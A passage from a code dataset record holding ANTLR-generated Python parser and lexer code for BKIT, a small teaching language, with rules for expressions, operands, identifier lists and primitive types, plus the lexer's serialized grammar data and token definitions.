self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,12,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n self.state = 139\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,11,self._ctx)\n if la_ == 1:\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 133\n if not self.precpred(self._ctx, 3):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 3)\")\n self.state = 134\n self.match(BKITParser.DIV_INT)\n self.state = 135\n self.operand()\n pass\n\n elif la_ == 2:\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 136\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 137\n self.match(BKITParser.STAR_INT)\n self.state = 138\n self.operand()\n pass\n\n \n self.state = 143\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,12,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class SubexprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_subexpr\n\n\n\n\n def subexpr(self):\n\n localctx = BKITParser.SubexprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_subexpr)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 144\n self.match(BKITParser.LEFT_PAREN)\n self.state = 145\n self.expr()\n self.state = 146\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def Integer_literal(self):\n return self.getToken(BKITParser.Integer_literal, 0)\n\n def Float_literal(self):\n return self.getToken(BKITParser.Float_literal, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def subexpr(self):\n return self.getTypedRuleContext(BKITParser.SubexprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_operand)\n try:\n self.state = 153\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,13,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 148\n self.match(BKITParser.Integer_literal)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 149\n self.match(BKITParser.Float_literal)\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 150\n self.match(BKITParser.ID)\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 151\n self.call_stmt()\n pass\n\n elif la_ == 5:\n self.enterOuterAlt(localctx, 5)\n self.state = 152\n self.subexpr()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ids_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ID)\n else:\n return self.getToken(BKITParser.ID, i)\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_ids_list\n\n\n\n\n def ids_list(self):\n\n localctx = BKITParser.Ids_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 32, self.RULE_ids_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 155\n self.match(BKITParser.ID)\n self.state = 160\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 156\n self.match(BKITParser.COMMA)\n self.state = 157\n self.match(BKITParser.ID)\n self.state = 162\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT(self):\n return self.getToken(BKITParser.INT, 0)\n\n def FLOAT(self):\n return self.getToken(BKITParser.FLOAT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_type\n\n\n\n\n def primitive_type(self):\n\n localctx = BKITParser.Primitive_typeContext(self, self._ctx, self.state)\n self.enterRule(localctx, 34, self.RULE_primitive_type)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 163\n _la = self._input.LA(1)\n if not(_la==BKITParser.INT or _la==BKITParser.FLOAT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[9] = self.exprs_list_sempred\n self._predicates[12] = self.expr1_sempred\n self._predicates[13] = self.expr2_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def exprs_list_sempred(self, localctx:Exprs_listContext, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 1)\n \n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 2:\n return self.precpred(self._ctx, 3)\n \n\n if predIndex == 3:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.3158814609050751, "alphanum_fraction": 0.5556409955024719, "avg_line_length": 53.507633209228516, "blob_id": "e47c6e7359a3d971f5d117aba4891748024d473c", "content_id": "e81176c84f7bb84c36738be97e6c3e6403275c80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14306, "license_type": "no_license", "max_line_length": 107, "num_lines": 262, "path": "/SyntaxAnalysis/tut/src/forJava/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/SyntaxAnalysis/tut/src/forJava/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\36\")\n buf.write(\"\\u012d\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\3\\2\")\n buf.write(\"\\3\\2\\3\\2\\7\\2_\\n\\2\\f\\2\\16\\2b\\13\\2\\3\\3\\3\\3\\7\\3f\\n\\3\\f\\3\")\n buf.write(\"\\16\\3i\\13\\3\\3\\3\\3\\3\\3\\4\\3\\4\\7\\4o\\n\\4\\f\\4\\16\\4r\\13\\4\\3\")\n buf.write(\"\\4\\5\\4u\\n\\4\\3\\4\\3\\4\\3\\5\\3\\5\\3\\5\\3\\5\\7\\5}\\n\\5\\f\\5\\16\\5\")\n buf.write(\"\\u0080\\13\\5\\3\\5\\3\\5\\3\\5\\3\\5\\3\\5\\3\\6\\3\\6\\3\\6\\3\\6\\7\\6\\u008b\")\n buf.write(\"\\n\\6\\f\\6\\16\\6\\u008e\\13\\6\\3\\6\\3\\6\\3\\7\\3\\7\\3\\b\\6\\b\\u0095\")\n buf.write(\"\\n\\b\\r\\b\\16\\b\\u0096\\3\\b\\3\\b\\3\\t\\3\\t\\3\\n\\3\\n\\3\\13\\3\\13\")\n buf.write(\"\\3\\f\\3\\f\\5\\f\\u00a3\\n\\f\\3\\r\\3\\r\\5\\r\\u00a7\\n\\r\\3\\r\\6\\r\\u00aa\")\n buf.write(\"\\n\\r\\r\\r\\16\\r\\u00ab\\3\\16\\3\\16\\7\\16\\u00b0\\n\\16\\f\\16\\16\")\n buf.write(\"\\16\\u00b3\\13\\16\\3\\17\\6\\17\\u00b6\\n\\17\\r\\17\\16\\17\\u00b7\")\n buf.write(\"\\3\\17\\3\\17\\5\\17\\u00bc\\n\\17\\3\\17\\5\\17\\u00bf\\n\\17\\3\\20\\3\")\n buf.write(\"\\20\\3\\20\\3\\21\\3\\21\\3\\21\\3\\22\\3\\22\\3\\22\\3\\23\\3\\23\\3\\23\")\n buf.write(\"\\5\\23\\u00cd\\n\\23\\3\\24\\3\\24\\3\\25\\3\\25\\3\\26\\3\\26\\3\\26\\3\")\n buf.write(\"\\26\\5\\26\\u00d7\\n\\26\\3\\26\\6\\26\\u00da\\n\\26\\r\\26\\16\\26\\u00db\")\n buf.write(\"\\3\\27\\6\\27\\u00df\\n\\27\\r\\27\\16\\27\\u00e0\\3\\30\\3\\30\\3\\30\")\n buf.write(\"\\3\\30\\5\\30\\u00e7\\n\\30\\3\\30\\6\\30\\u00ea\\n\\30\\r\\30\\16\\30\")\n buf.write(\"\\u00eb\\3\\31\\3\\31\\3\\31\\5\\31\\u00f1\\n\\31\\3\\32\\3\\32\\3\\33\\3\")\n buf.write(\"\\33\\7\\33\\u00f7\\n\\33\\f\\33\\16\\33\\u00fa\\13\\33\\3\\33\\3\\33\\3\")\n buf.write(\"\\33\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\35\\3\\35\\3\\35\")\n buf.write(\"\\3\\35\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\36\\3\\37\\3\\37\\3 \\3 \\3\")\n buf.write(\"!\\3!\\3\\\"\\3\\\"\\3#\\3#\\3$\\3$\\3%\\3%\\3&\\3&\\3\\'\\3\\'\\3(\\3(\\3)\")\n buf.write(\"\\3)\\3*\\3*\\3+\\3+\\3,\\3,\\3-\\3-\\4~\\u008c\\2.\\3\\3\\5\\4\\7\\5\\t\")\n buf.write(\"\\6\\13\\7\\r\\b\\17\\t\\21\\2\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\\2\\37\")\n buf.write(\"\\2!\\2#\\2%\\2\\'\\2)\\2+\\2-\\2/\\2\\61\\n\\63\\13\\65\\f\\67\\r9\\16;\")\n buf.write(\"\\17=\\20?\\21A\\22C\\23E\\24G\\25I\\26K\\27M\\30O\\31Q\\32S\\33U\\34\")\n buf.write(\"W\\35Y\\36\\3\\2\\16\\4\\3\\n\\f\\16\\17\\4\\2\\60\\60AA\\5\\2\\13\\f\\16\")\n buf.write(\"\\17\\\"\\\"\\3\\2c|\\3\\2C\\\\\\3\\2\\62;\\4\\2GGgg\\3\\2\\60\\60\\t\\2))^\")\n buf.write(\"^ddhhppttvv\\7\\2\\n\\f\\16\\17$$))^^\\5\\2\\62;CHch\\3\\2\\629\\2\")\n buf.write(\"\\u0134\\2\\3\\3\\2\\2\\2\\2\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\")\n buf.write(\"\\2\\13\\3\\2\\2\\2\\2\\r\\3\\2\\2\\2\\2\\17\\3\\2\\2\\2\\2\\61\\3\\2\\2\\2\\2\")\n buf.write(\"\\63\\3\\2\\2\\2\\2\\65\\3\\2\\2\\2\\2\\67\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2;\\3\")\n buf.write(\"\\2\\2\\2\\2=\\3\\2\\2\\2\\2?\\3\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\")\n buf.write(\"\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2\")\n buf.write(\"O\\3\\2\\2\\2\\2Q\\3\\2\\2\\2\\2S\\3\\2\\2\\2\\2U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\")\n buf.write(\"\\2Y\\3\\2\\2\\2\\3[\\3\\2\\2\\2\\5c\\3\\2\\2\\2\\7l\\3\\2\\2\\2\\tx\\3\\2\\2\")\n buf.write(\"\\2\\13\\u0086\\3\\2\\2\\2\\r\\u0091\\3\\2\\2\\2\\17\\u0094\\3\\2\\2\\2\\21\")\n buf.write(\"\\u009a\\3\\2\\2\\2\\23\\u009c\\3\\2\\2\\2\\25\\u009e\\3\\2\\2\\2\\27\\u00a2\")\n buf.write(\"\\3\\2\\2\\2\\31\\u00a4\\3\\2\\2\\2\\33\\u00ad\\3\\2\\2\\2\\35\\u00b5\\3\")\n buf.write(\"\\2\\2\\2\\37\\u00c0\\3\\2\\2\\2!\\u00c3\\3\\2\\2\\2#\\u00c6\\3\\2\\2\\2\")\n buf.write(\"%\\u00cc\\3\\2\\2\\2\\'\\u00ce\\3\\2\\2\\2)\\u00d0\\3\\2\\2\\2+\\u00d6\")\n buf.write(\"\\3\\2\\2\\2-\\u00de\\3\\2\\2\\2/\\u00e6\\3\\2\\2\\2\\61\\u00f0\\3\\2\\2\")\n buf.write(\"\\2\\63\\u00f2\\3\\2\\2\\2\\65\\u00f4\\3\\2\\2\\2\\67\\u00fe\\3\\2\\2\\2\")\n buf.write(\"9\\u0105\\3\\2\\2\\2;\\u0109\\3\\2\\2\\2=\\u010f\\3\\2\\2\\2?\\u0111\\3\")\n buf.write(\"\\2\\2\\2A\\u0113\\3\\2\\2\\2C\\u0115\\3\\2\\2\\2E\\u0117\\3\\2\\2\\2G\\u0119\")\n buf.write(\"\\3\\2\\2\\2I\\u011b\\3\\2\\2\\2K\\u011d\\3\\2\\2\\2M\\u011f\\3\\2\\2\\2\")\n buf.write(\"O\\u0121\\3\\2\\2\\2Q\\u0123\\3\\2\\2\\2S\\u0125\\3\\2\\2\\2U\\u0127\\3\")\n buf.write(\"\\2\\2\\2W\\u0129\\3\\2\\2\\2Y\\u012b\\3\\2\\2\\2[`\\5\\21\\t\\2\\\\_\\5\\21\")\n buf.write(\"\\t\\2]_\\5\\25\\13\\2^\\\\\\3\\2\\2\\2^]\\3\\2\\2\\2_b\\3\\2\\2\\2`^\\3\\2\")\n buf.write(\"\\2\\2`a\\3\\2\\2\\2a\\4\\3\\2\\2\\2b`\\3\\2\\2\\2cg\\7$\\2\\2df\\5%\\23\\2\")\n buf.write(\"ed\\3\\2\\2\\2fi\\3\\2\\2\\2ge\\3\\2\\2\\2gh\\3\\2\\2\\2hj\\3\\2\\2\\2ig\\3\")\n buf.write(\"\\2\\2\\2jk\\5\\37\\20\\2k\\6\\3\\2\\2\\2lp\\7$\\2\\2mo\\5%\\23\\2nm\\3\\2\")\n buf.write(\"\\2\\2or\\3\\2\\2\\2pn\\3\\2\\2\\2pq\\3\\2\\2\\2qt\\3\\2\\2\\2rp\\3\\2\\2\\2\")\n buf.write(\"su\\t\\2\\2\\2ts\\3\\2\\2\\2uv\\3\\2\\2\\2vw\\b\\4\\2\\2w\\b\\3\\2\\2\\2xy\")\n buf.write(\"\\7,\\2\\2yz\\7,\\2\\2z~\\3\\2\\2\\2{}\\13\\2\\2\\2|{\\3\\2\\2\\2}\\u0080\")\n buf.write(\"\\3\\2\\2\\2~\\177\\3\\2\\2\\2~|\\3\\2\\2\\2\\177\\u0081\\3\\2\\2\\2\\u0080\")\n buf.write(\"~\\3\\2\\2\\2\\u0081\\u0082\\7,\\2\\2\\u0082\\u0083\\7,\\2\\2\\u0083\")\n buf.write(\"\\u0084\\3\\2\\2\\2\\u0084\\u0085\\b\\5\\3\\2\\u0085\\n\\3\\2\\2\\2\\u0086\")\n buf.write(\"\\u0087\\7,\\2\\2\\u0087\\u0088\\7,\\2\\2\\u0088\\u008c\\3\\2\\2\\2\\u0089\")\n buf.write(\"\\u008b\\13\\2\\2\\2\\u008a\\u0089\\3\\2\\2\\2\\u008b\\u008e\\3\\2\\2\")\n buf.write(\"\\2\\u008c\\u008d\\3\\2\\2\\2\\u008c\\u008a\\3\\2\\2\\2\\u008d\\u008f\")\n buf.write(\"\\3\\2\\2\\2\\u008e\\u008c\\3\\2\\2\\2\\u008f\\u0090\\7\\2\\2\\3\\u0090\")\n buf.write(\"\\f\\3\\2\\2\\2\\u0091\\u0092\\t\\3\\2\\2\\u0092\\16\\3\\2\\2\\2\\u0093\")\n buf.write(\"\\u0095\\t\\4\\2\\2\\u0094\\u0093\\3\\2\\2\\2\\u0095\\u0096\\3\\2\\2\\2\")\n buf.write(\"\\u0096\\u0094\\3\\2\\2\\2\\u0096\\u0097\\3\\2\\2\\2\\u0097\\u0098\\3\")\n buf.write(\"\\2\\2\\2\\u0098\\u0099\\b\\b\\3\\2\\u0099\\20\\3\\2\\2\\2\\u009a\\u009b\")\n buf.write(\"\\t\\5\\2\\2\\u009b\\22\\3\\2\\2\\2\\u009c\\u009d\\t\\6\\2\\2\\u009d\\24\")\n buf.write(\"\\3\\2\\2\\2\\u009e\\u009f\\t\\7\\2\\2\\u009f\\26\\3\\2\\2\\2\\u00a0\\u00a3\")\n buf.write(\"\\5\\21\\t\\2\\u00a1\\u00a3\\5\\23\\n\\2\\u00a2\\u00a0\\3\\2\\2\\2\\u00a2\")\n buf.write(\"\\u00a1\\3\\2\\2\\2\\u00a3\\30\\3\\2\\2\\2\\u00a4\\u00a6\\t\\b\\2\\2\\u00a5\")\n buf.write(\"\\u00a7\\5? \\2\\u00a6\\u00a5\\3\\2\\2\\2\\u00a6\\u00a7\\3\\2\\2\\2\\u00a7\")\n buf.write(\"\\u00a9\\3\\2\\2\\2\\u00a8\\u00aa\\5\\25\\13\\2\\u00a9\\u00a8\\3\\2\\2\")\n buf.write(\"\\2\\u00aa\\u00ab\\3\\2\\2\\2\\u00ab\\u00a9\\3\\2\\2\\2\\u00ab\\u00ac\")\n buf.write(\"\\3\\2\\2\\2\\u00ac\\32\\3\\2\\2\\2\\u00ad\\u00b1\\t\\t\\2\\2\\u00ae\\u00b0\")\n buf.write(\"\\5\\25\\13\\2\\u00af\\u00ae\\3\\2\\2\\2\\u00b0\\u00b3\\3\\2\\2\\2\\u00b1\")\n buf.write(\"\\u00af\\3\\2\\2\\2\\u00b1\\u00b2\\3\\2\\2\\2\\u00b2\\34\\3\\2\\2\\2\\u00b3\")\n buf.write(\"\\u00b1\\3\\2\\2\\2\\u00b4\\u00b6\\5\\25\\13\\2\\u00b5\\u00b4\\3\\2\\2\")\n buf.write(\"\\2\\u00b6\\u00b7\\3\\2\\2\\2\\u00b7\\u00b5\\3\\2\\2\\2\\u00b7\\u00b8\")\n buf.write(\"\\3\\2\\2\\2\\u00b8\\u00be\\3\\2\\2\\2\\u00b9\\u00bb\\5\\33\\16\\2\\u00ba\")\n buf.write(\"\\u00bc\\5\\31\\r\\2\\u00bb\\u00ba\\3\\2\\2\\2\\u00bb\\u00bc\\3\\2\\2\")\n buf.write(\"\\2\\u00bc\\u00bf\\3\\2\\2\\2\\u00bd\\u00bf\\5\\31\\r\\2\\u00be\\u00b9\")\n buf.write(\"\\3\\2\\2\\2\\u00be\\u00bd\\3\\2\\2\\2\\u00bf\\36\\3\\2\\2\\2\\u00c0\\u00c1\")\n buf.write(\"\\7^\\2\\2\\u00c1\\u00c2\\n\\n\\2\\2\\u00c2 \\3\\2\\2\\2\\u00c3\\u00c4\")\n buf.write(\"\\7^\\2\\2\\u00c4\\u00c5\\t\\n\\2\\2\\u00c5\\\"\\3\\2\\2\\2\\u00c6\\u00c7\")\n buf.write(\"\\7)\\2\\2\\u00c7\\u00c8\\7$\\2\\2\\u00c8$\\3\\2\\2\\2\\u00c9\\u00cd\")\n buf.write(\"\\n\\13\\2\\2\\u00ca\\u00cd\\5!\\21\\2\\u00cb\\u00cd\\5#\\22\\2\\u00cc\")\n buf.write(\"\\u00c9\\3\\2\\2\\2\\u00cc\\u00ca\\3\\2\\2\\2\\u00cc\\u00cb\\3\\2\\2\\2\")\n buf.write(\"\\u00cd&\\3\\2\\2\\2\\u00ce\\u00cf\\t\\f\\2\\2\\u00cf(\\3\\2\\2\\2\\u00d0\")\n buf.write(\"\\u00d1\\t\\r\\2\\2\\u00d1*\\3\\2\\2\\2\\u00d2\\u00d3\\7\\62\\2\\2\\u00d3\")\n buf.write(\"\\u00d7\\7z\\2\\2\\u00d4\\u00d5\\7\\62\\2\\2\\u00d5\\u00d7\\7Z\\2\\2\")\n buf.write(\"\\u00d6\\u00d2\\3\\2\\2\\2\\u00d6\\u00d4\\3\\2\\2\\2\\u00d7\\u00d9\\3\")\n buf.write(\"\\2\\2\\2\\u00d8\\u00da\\5\\'\\24\\2\\u00d9\\u00d8\\3\\2\\2\\2\\u00da\")\n buf.write(\"\\u00db\\3\\2\\2\\2\\u00db\\u00d9\\3\\2\\2\\2\\u00db\\u00dc\\3\\2\\2\\2\")\n buf.write(\"\\u00dc,\\3\\2\\2\\2\\u00dd\\u00df\\5\\25\\13\\2\\u00de\\u00dd\\3\\2\")\n buf.write(\"\\2\\2\\u00df\\u00e0\\3\\2\\2\\2\\u00e0\\u00de\\3\\2\\2\\2\\u00e0\\u00e1\")\n buf.write(\"\\3\\2\\2\\2\\u00e1.\\3\\2\\2\\2\\u00e2\\u00e3\\7\\62\\2\\2\\u00e3\\u00e7\")\n buf.write(\"\\7q\\2\\2\\u00e4\\u00e5\\7\\62\\2\\2\\u00e5\\u00e7\\7Q\\2\\2\\u00e6\")\n buf.write(\"\\u00e2\\3\\2\\2\\2\\u00e6\\u00e4\\3\\2\\2\\2\\u00e7\\u00e9\\3\\2\\2\\2\")\n buf.write(\"\\u00e8\\u00ea\\5)\\25\\2\\u00e9\\u00e8\\3\\2\\2\\2\\u00ea\\u00eb\\3\")\n buf.write(\"\\2\\2\\2\\u00eb\\u00e9\\3\\2\\2\\2\\u00eb\\u00ec\\3\\2\\2\\2\\u00ec\\60\")\n buf.write(\"\\3\\2\\2\\2\\u00ed\\u00f1\\5-\\27\\2\\u00ee\\u00f1\\5+\\26\\2\\u00ef\")\n buf.write(\"\\u00f1\\5/\\30\\2\\u00f0\\u00ed\\3\\2\\2\\2\\u00f0\\u00ee\\3\\2\\2\\2\")\n buf.write(\"\\u00f0\\u00ef\\3\\2\\2\\2\\u00f1\\62\\3\\2\\2\\2\\u00f2\\u00f3\\5\\35\")\n buf.write(\"\\17\\2\\u00f3\\64\\3\\2\\2\\2\\u00f4\\u00f8\\7$\\2\\2\\u00f5\\u00f7\")\n buf.write(\"\\5%\\23\\2\\u00f6\\u00f5\\3\\2\\2\\2\\u00f7\\u00fa\\3\\2\\2\\2\\u00f8\")\n buf.write(\"\\u00f6\\3\\2\\2\\2\\u00f8\\u00f9\\3\\2\\2\\2\\u00f9\\u00fb\\3\\2\\2\\2\")\n buf.write(\"\\u00fa\\u00f8\\3\\2\\2\\2\\u00fb\\u00fc\\7$\\2\\2\\u00fc\\u00fd\\b\")\n buf.write(\"\\33\\4\\2\\u00fd\\66\\3\\2\\2\\2\\u00fe\\u00ff\\7t\\2\\2\\u00ff\\u0100\")\n buf.write(\"\\7g\\2\\2\\u0100\\u0101\\7v\\2\\2\\u0101\\u0102\\7w\\2\\2\\u0102\\u0103\")\n buf.write(\"\\7t\\2\\2\\u0103\\u0104\\7p\\2\\2\\u01048\\3\\2\\2\\2\\u0105\\u0106\")\n buf.write(\"\\7k\\2\\2\\u0106\\u0107\\7p\\2\\2\\u0107\\u0108\\7v\\2\\2\\u0108:\\3\")\n buf.write(\"\\2\\2\\2\\u0109\\u010a\\7h\\2\\2\\u010a\\u010b\\7n\\2\\2\\u010b\\u010c\")\n buf.write(\"\\7q\\2\\2\\u010c\\u010d\\7c\\2\\2\\u010d\\u010e\\7v\\2\\2\\u010e<\\3\")\n buf.write(\"\\2\\2\\2\\u010f\\u0110\\7-\\2\\2\\u0110>\\3\\2\\2\\2\\u0111\\u0112\\7\")\n buf.write(\"/\\2\\2\\u0112@\\3\\2\\2\\2\\u0113\\u0114\\7,\\2\\2\\u0114B\\3\\2\\2\\2\")\n buf.write(\"\\u0115\\u0116\\7\\61\\2\\2\\u0116D\\3\\2\\2\\2\\u0117\\u0118\\7*\\2\")\n buf.write(\"\\2\\u0118F\\3\\2\\2\\2\\u0119\\u011a\\7+\\2\\2\\u011aH\\3\\2\\2\\2\\u011b\")\n buf.write(\"\\u011c\\7]\\2\\2\\u011cJ\\3\\2\\2\\2\\u011d\\u011e\\7_\\2\\2\\u011e\")\n buf.write(\"L\\3\\2\\2\\2\\u011f\\u0120\\7}\\2\\2\\u0120N\\3\\2\\2\\2\\u0121\\u0122\")\n buf.write(\"\\7\\177\\2\\2\\u0122P\\3\\2\\2\\2\\u0123\\u0124\\7<\\2\\2\\u0124R\\3\")\n buf.write(\"\\2\\2\\2\\u0125\\u0126\\7\\60\\2\\2\\u0126T\\3\\2\\2\\2\\u0127\\u0128\")\n buf.write(\"\\7=\\2\\2\\u0128V\\3\\2\\2\\2\\u0129\\u012a\\7.\\2\\2\\u012aX\\3\\2\\2\")\n buf.write(\"\\2\\u012b\\u012c\\7?\\2\\2\\u012cZ\\3\\2\\2\\2\\32\\2^`gpt~\\u008c\")\n buf.write(\"\\u0096\\u00a2\\u00a6\\u00ab\\u00b1\\u00b7\\u00bb\\u00be\\u00cc\")\n buf.write(\"\\u00d6\\u00db\\u00e0\\u00e6\\u00eb\\u00f0\\u00f8\\5\\3\\4\\2\\b\\2\")\n buf.write(\"\\2\\3\\33\\3\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n ID = 1\n ILLEGAL_ESCAPE = 2\n UNCLOSE_STRING = 3\n COMMENT = 4\n UNTERMINATED_COMMENT = 5\n ERROR_CHAR = 6\n WS = 7\n Integer_literal = 8\n Float_literal = 9\n String_literal = 10\n RETURN = 11\n INT = 12\n FLOAT = 13\n PLUS_INT = 14\n MINUS_INT = 15\n STAR_INT = 16\n DIV_INT = 17\n LEFT_PAREN = 18\n RIGHT_PAREN = 19\n LEFT_BRACKET = 20\n RIGHT_BRACKET = 21\n LEFT_BRACE = 22\n RIGHT_BRACE = 23\n COLON = 24\n DOT = 25\n SEMI = 26\n COMMA = 27\n ASSIGN = 28\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'return'\", \"'int'\", \"'float'\", \"'+'\", \"'-'\", \"'*'\", \"'/'\", \n \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \n \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \"Float_literal\", \"String_literal\", \n \"RETURN\", \"INT\", \"FLOAT\", \"PLUS_INT\", \"MINUS_INT\", \"STAR_INT\", \n \"DIV_INT\", \"LEFT_PAREN\", \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \n \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", 